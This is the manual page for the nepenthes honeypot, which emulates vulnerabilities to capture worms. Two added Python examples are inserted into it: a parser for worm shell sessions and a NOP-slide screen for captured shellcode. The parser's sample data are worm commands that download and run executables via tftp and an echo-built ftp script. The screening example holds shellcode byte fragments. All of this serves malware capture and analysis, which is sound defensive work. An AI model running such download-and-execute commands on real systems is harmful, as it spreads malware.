NAME
nepenthes - finest collection -
SYNOPSIS
nepenthes [OPTIONS]
nepenthes [OPTIONS] [PATH]
DESCRIPTION
By emulating widespread vulnerabilities, nepenthes is able to catch and
store worms that exploit them. Deploying a nepenthes sensor also lets you
measure the malware activity on a network. The program emulates several
well-known vulnerabilities and waits for malicious connections that try
to exploit them. When a connection attempts an exploit, nepenthes tries
to determine which exploit is being used. There are several ways an
exploitation can proceed; the attacker can ask nepenthes to:
o connect back to a provided IP address and port and offer a shell there
(connectback)
o bind a shell on a port (bindshell)
o directly execute a shell command
o download a file from a provided URL and execute it
o use specific file transfer mechanisms to transfer the file (link,
blink, mydoom ...)
If a shell is expected, either a bindshell or a connectback shell,
nepenthes offers this shell to the attacker and carries out the requested
actions. In most cases worms spread themselves through a shell in one of
two ways:
o tftp - the trivial file transfer protocol, using tftp.exe on Microsoft
Windows.
o ftp - the file transfer protocol, using ftp.exe on Microsoft Windows.
Nepenthes parses the shell instructions and tries to download the file;
on success the file is stored.
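The shell parsing described above, as an added example that is not nepenthes code: it takes the command lines a worm types into a bindshell or connectback shell, recognises the tftp.exe and ftp.exe download idioms (including an ftp script assembled with echo redirects), and recovers the file to fetch. The two sessions, the hosts (192.0.2.0/24 documentation range) and the file names are constructed for the example.

```python
"""Recover a worm's download from the commands it types into an emulated shell.

Added example, not nepenthes code. Sessions, hosts and file names are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: tftp.exe fetch followed by execution of the binary.
TFTP_SESSION = "tftp -i 192.0.2.10 GET worm.exe\r\nstart worm.exe\r\n"

# Constructed sample: ftp.exe driven by a script the worm writes with echo, run with -s:.
FTP_SESSION = (
    "echo open 192.0.2.20 21 > o\r\n"
    "echo user bot pass123 >> o\r\n"
    "echo binary >> o\r\n"
    "echo get bot.exe >> o\r\n"
    "echo bye >> o\r\n"
    "ftp -n -s:o\r\n"
    "bot.exe\r\n"
    "del o\r\n"
)


@dataclass
class Download:
    scheme: str
    host: str
    port: int
    filename: str
    user: Optional[str] = None
    password: Optional[str] = None

    def url(self) -> str:
        cred = f"{self.user}:{self.password}@" if self.user else ""
        return f"{self.scheme}://{cred}{self.host}:{self.port}/{self.filename}"


# Windows tftp.exe syntax: tftp [-i] host GET source [destination]
TFTP_RE = re.compile(r"\btftp(?:\.exe)?\s+(?:-i\s+)?(\S+)\s+get\s+(\S+)", re.I)
# echo <text> > file  /  echo <text> >> file  (how the worm builds its ftp script)
ECHO_RE = re.compile(r"^echo\s+(.*?)\s*(>>|>)\s*(\S+)\s*$", re.I)
# ftp [-n] [-v] -s:scriptfile
FTP_RE = re.compile(r"^ftp(?:\.exe)?\b.*?-s:(\S+)", re.I)


def split_commands(session: str) -> List[str]:
    """Split raw shell input into stripped, non-empty command lines."""
    return [line.strip() for line in re.split(r"\r?\n", session) if line.strip()]


def parse_tftp(cmds: List[str]) -> Optional[Download]:
    for cmd in cmds:
        m = TFTP_RE.search(cmd)
        if m:
            return Download("tftp", m.group(1), 69, m.group(2))
    return None


def collect_scripts(cmds: List[str]) -> Dict[str, List[str]]:
    """Rebuild files written with 'echo ... > name' / 'echo ... >> name'."""
    scripts: Dict[str, List[str]] = {}
    for cmd in cmds:
        m = ECHO_RE.match(cmd)
        if not m:
            continue
        body, op, name = m.groups()
        if op == ">":  # truncating redirect starts a fresh file
            scripts[name] = []
        scripts.setdefault(name, []).append(body)
    return scripts


def parse_ftp(cmds: List[str]) -> Optional[Download]:
    scripts = collect_scripts(cmds)
    for cmd in cmds:
        m = FTP_RE.match(cmd)
        if not m or m.group(1) not in scripts:
            continue
        host, port, user, password, filename = None, 21, None, None, None
        for line in scripts[m.group(1)]:
            parts = line.split()
            verb = parts[0].lower() if parts else ""
            if verb == "open" and len(parts) >= 2:
                host = parts[1]
                if len(parts) >= 3 and parts[2].isdigit():
                    port = int(parts[2])
            elif verb == "user" and len(parts) >= 2:
                user = parts[1]
                password = parts[2] if len(parts) >= 3 else None
            elif verb in ("get", "mget") and len(parts) >= 2:
                filename = parts[1]  # remote name; a local name may follow
        if host and filename:
            return Download("ftp", host, port, filename, user, password)
    return None


def parse_session(session: str) -> Optional[Download]:
    """Return the download a shell session asks for, or None if there is none."""
    cmds = split_commands(session)
    return parse_tftp(cmds) or parse_ftp(cmds)


if __name__ == "__main__":
    for name, sess in (("tftp", TFTP_SESSION), ("ftp", FTP_SESSION)):
        dl = parse_session(sess)
        print(name, "->", dl.url() if dl else "no download found")
```

The ftp case is the one worth getting right: the script file does not exist until the echo lines are replayed, so the parser has to reconstruct it before it can read the open/user/get verbs; a truncating '>' resets the file, '>>' appends, mirroring what cmd.exe would do.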
OPTIONS
-c PATH, --config=PATH
PATH to nepenthes.conf
-d PATTERN, --disk-log=PATTERN
apply filter to disk (file) logging. PATTERN can consist of crit,
warn, info, debug and spam; combine tags using ','.
-f OPTIONS PATH, --file-check=OPTIONS PATH
Use nepenthes to check whether a file, or the files in a directory, at
PATH contain known shellcodes. PATH can be a directory or multiple
files. OPTIONS is a comma-separated list of rmknown, rmnonop and
nothing.
-h, --help
show help
-H, --large-help
show help with default values
-i, --info
how to contact us
-k, --check-config
check nepenthes.conf config for syntax errors
-l PATTERN, --log=PATTERN
apply filter to console logging. PATTERN can consist of crit,
warn, info, debug and spam; combine tags using ','.
-L, --logging-help
display help for -d and -l
-o, --no-color
log without colors to console (does not work yet).
-r PATH, --chroot=PATH
chroot to PATH
-R, --ringlog
use ringlogger instead of filelogger
-u USER, --user=USER
switch the user the process runs as. USER must be a user name.
-g GROUP, --group=GROUP
switch the group the process runs as. GROUP must be a group name.
-v, --version
show version
-w PATH, --workingdir=PATH
PATH the process uses as its working directory
EXAMPLES
nepenthes -d crit,warn,info
start nepenthes and log only messages with log level critical,
warning and info to disk
nepenthes -u marshall -g mother
start nepenthes and change to user marshall and group mother.
nepenthes -r /opt/nepenthes
start nepenthes and chroot to /opt/nepenthes
nepenthes -u marshall -g mother -r /opt/nepenthes
start nepenthes and change to user marshall and group mother
and chroot to /opt/nepenthes
nepenthes -f rmknown,rmnonop,dononp /opt/nepenthes/var/hexdumps/
check the directory /opt/nepenthes/var/hexdumps/ for known
shellcodes, remove known shellcodes, remove shellcodes
without a NOP slide, and check the shellcodes without a NOP slide.
nepenthes -f nothing /tmp/*.bin /tmp/unknown_shellcodes/
check the files matching /tmp/*.bin and the files in the directory
/tmp/unknown_shellcodes/ for known shellcodes, and do nothing with
them.
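The rmnonop screening used in the file-check examples above, as an added example that is not nepenthes code: it scans each captured dump for a run of NOP-equivalent bytes and marks dumps without one for removal. The sample dumps are constructed; the slide threshold and the set of bytes treated as a NOP (0x90 plus the one-byte inc/dec r32 opcodes 0x40-0x4f) are assumptions, not nepenthes' own criteria.

```python
"""Screen captured shellcode dumps for a NOP slide (the rmnonop criterion).

Added example, not nepenthes code. Sample dumps, the threshold and the
NOP-equivalent byte set are assumptions made for the example.
"""
from pathlib import Path
from typing import Dict

# Assumed NOP-equivalents: nop (0x90) and single-byte inc/dec r32 (0x40-0x4f).
NOP_EQUIVALENTS = frozenset({0x90} | set(range(0x40, 0x50)))
MIN_SLIDE = 16  # assumed threshold; shorter runs occur by chance in real data

# Constructed dumps: classic 0x90 slide, inc-based slide, and padding with no slide.
SAMPLE_DUMPS: Dict[str, bytes] = {
    "classic.bin": b"\x90" * 32 + b"\xeb\x1f\x5e\x89\x76\x08\x31\xc0",
    "inc_slide.bin": b"\x41\x42\x43\x44" * 6 + b"\xeb\x1f\x5e\x89\x76\x08",
    "no_slide.bin": b"\x00\x01\x02\x03\xff\xfe" * 16 + b"\xeb\x1f",
}


def longest_nop_run(data: bytes) -> int:
    """Length of the longest run of consecutive NOP-equivalent bytes."""
    best = run = 0
    for byte in data:
        run = run + 1 if byte in NOP_EQUIVALENTS else 0
        best = max(best, run)
    return best


def has_nop_slide(data: bytes, min_slide: int = MIN_SLIDE) -> bool:
    return longest_nop_run(data) >= min_slide


def triage(dumps: Dict[str, bytes], min_slide: int = MIN_SLIDE) -> Dict[str, str]:
    """Map each dump name to 'keep' or 'rmnonop' (what -f rmnonop would drop)."""
    return {
        name: "keep" if has_nop_slide(data, min_slide) else "rmnonop"
        for name, data in dumps.items()
    }


def triage_dir(path: Path, pattern: str = "*", min_slide: int = MIN_SLIDE,
               remove: bool = False) -> Dict[str, str]:
    """Apply triage to the files in a directory; delete no-slide dumps if remove is set."""
    dumps = {p.name: p.read_bytes() for p in sorted(path.glob(pattern)) if p.is_file()}
    verdicts = triage(dumps, min_slide)
    if remove:
        for name, verdict in verdicts.items():
            if verdict == "rmnonop":
                (path / name).unlink()
    return verdicts


if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_DUMPS).items():
        print(f"{name}: {verdict} (longest run {longest_nop_run(SAMPLE_DUMPS[name])})")
```

Run triage_dir with remove=False first and review the verdicts: a payload that starts directly with a decoder stub has no slide and would be dropped by this rule, which is exactly why the manual pairs rmnonop with a separate check of the no-slide dumps.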
FILES
etc/nepenthes/nepenthes.conf
nepenthes configuration file
lib/nepenthes/
nepenthes modules
etc/nepenthes/
nepenthes modules configuration files
BUGS
this manual is a pain
SEE ALSO
nepenthes.conf(5)